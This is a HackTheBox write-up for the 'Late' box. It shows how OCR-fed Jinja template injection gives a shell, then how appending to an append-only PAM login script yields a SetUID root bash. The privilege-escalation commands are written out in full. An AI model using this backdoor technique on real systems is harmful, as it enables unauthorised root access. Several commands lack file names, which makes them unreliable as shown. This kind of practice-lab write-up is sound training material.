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HTB Writeup: Late

Writeup about the 'late' box from HackTheBox

In this first writeup i’ll show how to complete the box ‘Late’

Late is a pretty easy box, first off all we will find a website that does img OCR and then exploit the server-side template injection vulnerability


Let’s run out beloved NMAP

Nmap screenshot

We have NGINX behind port 80


Website screenshot

In the “Frequently Asked Questions” section, there is a paragraph with a link to images.late.htb:

I’ll add both the domain and the subdomain to my /etc/hosts file: late.htb images.late.htb


The site is a simple HTML form that claims it will convert an image to text:

images.late.hb screenshot

When I upload an image (the one I had for testing didn’t have any text in it), it returns a results.txt file:


By creating a simple image with text in it and uploading it:

images.late.hb screenshot

<p>This is a test</p>

This gave me and idea


The server is likely taking the OCR results and rendering them into a template using the Jinja templating engine. To test for server-side template injection (SSTI), I’ll send the following image:

images.late.hb screenshot

When I upload this, if it returns “{{ 7*7 }}”, that shows the OCR read the text and returned it. However, it if returns “49”, then it shows my input was executed, which is evidence of SSTI. It returns:


Time to test command execution by trying this little payload i found in PayloadAllTheThings

payload screenshot It works!

<p>uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc)</p>

Reverse Shell

Let’s put NC in listening and launch a simple reverse shell

reverse shell screenshot

I’m in!

reverse shell screenshot

We got user.txt!

svc_acc@late:~$ cat user.txt

and also a RSA key pair for simple ssh connection

Getting root

Running LeanPeas an interesting script is found


To figure out if/how this script is being executed, I’ll look for it in /etc, where configuration files typically live on Linux:

svc_acc@late:~$ grep -r /etc/ 2>/dev/null
/etc/pam.d/sshd:session required /usr/local/sbin/

This shows that it’s running the script after each successful SSH login.


SUBJECT="Email from Server Login: SSH Alert"

A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}

Script permission

The script is owned by svc_acc, and is writable by this account as well:

svc_acc@late:~$ ls -l /usr/local/sbin/
-rwxr-xr-x 1 svc_acc svc_acc 433 Jul 25 21:01 /usr/local/sbin/

However, if I try to overwrite it, the system blocks it:

svc_acc@late:~$ echo > /usr/local/sbin/
-bash: /usr/local/sbin/ Operation not permitted

That’s because the a attribute is set, which says to only allow appending:

svc_acc@late:~$ lsattr /usr/local/sbin/
-----a--------e--- /usr/local/sbin/


To exploit this, I’ll use the following line to ceate a SetUID Bash executable:

svc_acc@late:~$ echo -e "cp /bin/bash /tmp/rootsh\nchmod 4755 /tmp/rootsh"
cp /bin/bash /tmp/rootsh
chmod 4755 /tmp/rootsh
svc_acc@late:~$ echo -e "cp /bin/bash /tmp/rootsh\nchmod 4755 /tmp/rootsh" >> /usr/local/sbin/

Now I’ll log in over SSH as svc_acc, and there’s rootsh owned by root with the SetUID bit on:

svc_acc@late:~$ ls -l /tmp/rootsh
-rwsr-xr-x 1 root root 1113504 Jul 25 21:12 /tmp/rootsh

I’ll run with -p to not drop privileges and get a root shell:

svc_acc@late:~$ /tmp/rootsh -p

And get root.txt:

rootsh-4.4# cat root.txt